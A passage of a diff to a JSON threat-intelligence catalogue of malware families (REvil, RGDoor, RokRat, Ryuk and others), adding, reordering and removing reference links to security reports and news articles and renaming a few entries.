"https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html", + "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", + "https://twitter.com/fwosar/status/1420119812815138824", + "https://hatching.io/blog/ransomware-part2", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/", + "https://www.secureworks.com/research/lv-ransomware", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/", + "https://community.riskiq.com/article/3315064b", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/", "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", + "https://twitter.com/_alex_il_/status/1412403420217159694", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/", + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", + "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/", + "https://twitter.com/Jacob_Pimental/status/1391055792774729728", + "https://twitter.com/SophosLabs/status/1412056467201462276", + "https://threatpost.com/ransomware-revil-sites-disappears/167745/", + "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack", + "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/", "https://www.certego.net/en/news/malware-tales-sodinokibi/", "https://www.secureworks.com/blog/revil-the-gandcrab-connection", - "https://hatching.io/blog/ransomware-part2", + "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/", "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti", + "https://www.kaseya.com/potential-attack-on-kaseya-vsa/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain", "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", + "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/", + "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions", "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/", "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://vimeo.com/449849549", "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/", + "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json", + "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/", + "https://twitter.com/R3MRUM/status/1412064882623713283", + "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics", "https://www.domaintools.com/resources/blog/revealing-revil-ransomware-with-domaintools-and-maltego", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", + "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/", "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html", - "https://community.riskiq.com/article/3315064b", + "https://kaseya.app.box.com/s/0ysvgss7w48nxh8k1xt7fqhbcjxhas40", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", + "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/", + "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/", + "https://twitter.com/SophosLabs/status/1413616952313004040?s=20", "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/", "https://blog.amossys.fr/sodinokibi-malware-analysis.html", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "https://twitter.com/LloydLabs/status/1411098844209819648", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter", + "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html", + "https://securelist.com/ransomware-world-in-2021/102169/", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.youtube.com/watch?v=tZVFMVm5GAk", + "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs", + "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/", + "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/", + "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html", "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/", + "https://unit42.paloaltonetworks.com/prometheus-ransomware/", "https://threatintel.blog/OPBlueRaven-Part1/", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://velzart.nl/blog/ransomeware/", "https://isc.sans.edu/diary/27012", + "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", "https://securelist.com/sodin-ransomware/91473/", + "https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/", + "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", + "https://unit42.paloaltonetworks.com/revil-threat-actors/", + "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/", + "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling", + "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/", + "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/", + "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "https://www.youtube.com/watch?v=QYQQUUpU04s", + "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://www.kpn.com/security-blogs/Tracking-REvil.htm", + "https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://twitter.com/SyscallE/status/1411074271875670022", + "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/", + "https://twitter.com/resecurity_com/status/1412662343796813827", + "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/", - "https://vimeo.com/449849549", + "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", + "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/", + "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html", "https://www.youtube.com/watch?v=l2P5CMH9TE0", + "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20", "https://www.grahamcluley.com/travelex-paid-ransom/", "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain", "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/", "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/", + "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/", "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights", + "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", + "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles", "https://www.secureworks.com/research/threat-profiles/gold-southfield", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", "https://asec.ahnlab.com/ko/19640/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/", - "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel", - "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/", + "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://intel471.com/blog/changes-in-revil-ransomware-version-2-2", "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html", + "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos" ], "synonyms": [ @@ -26546,17 +30393,22 @@ "type": [] }, "uuid": "e7698597-e0a9-4f4b-9920-09f5db225bd4", - "value": "REvil" + "value": "REvil (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", - "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", + "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/" ], "synonyms": [], @@ -26566,7 +30418,7 @@ "value": "RGDoor" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino", @@ -26576,7 +30428,7 @@ "type": [] }, "uuid": "cff6ec82-9d14-4307-9b5b-c0bd17e62f2a", - "value": "Rhino Ransomware" + "value": "Rhino" }, { "description": "", @@ -26681,11 +30533,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", + "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/", - "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf", + "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/", "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/" + "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/" ], "synonyms": [ "Gussdoor", @@ -26710,6 +30563,8 @@ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/", "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/", + "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", + "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", "https://goggleheadedhacker.com/blog/post/12", "https://twitter.com/VK_Intel/status/1121440931759128576", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", @@ -26743,6 +30598,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], @@ -26772,7 +30628,8 @@ "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", - "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/" + "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/", + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/" ], "synonyms": [], "type": [] @@ -26798,26 +30655,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", - "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", - "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", - "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", - "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", - "https://www.ibm.com/downloads/cas/Z81AVOY7", - "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "https://www.youtube.com/watch?v=uoBQE5s2ba4", - "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", "http://v3lo.tistory.com/24", "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", + "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", + "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.youtube.com/watch?v=uoBQE5s2ba4", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", + "https://www.ibm.com/downloads/cas/Z81AVOY7", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", + "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [ "DOGCALL" @@ -26943,6 +30803,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", "https://github.com/nccgroup/Royal_APT", "https://www.secureworks.com/research/threat-profiles/bronze-palace", + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], @@ -26958,6 +30819,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", "https://github.com/nccgroup/Royal_APT", "https://www.secureworks.com/research/threat-profiles/bronze-palace", + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], @@ -26984,11 +30846,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", - "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", "https://www.youtube.com/watch?v=YXnNO3TipvM", - "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html", - "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" + "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/" ], "synonyms": [ "Redaman" @@ -27070,6 +30934,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", @@ -27088,21 +30953,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/", "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/", "https://community.riskiq.com/article/0bcefe76", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/", "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html", "https://twitter.com/ffforward/status/1324281530026524672", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf", + "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://twitter.com/anthomsec/status/1321865315513520128", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/", @@ -27124,15 +30995,18 @@ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", 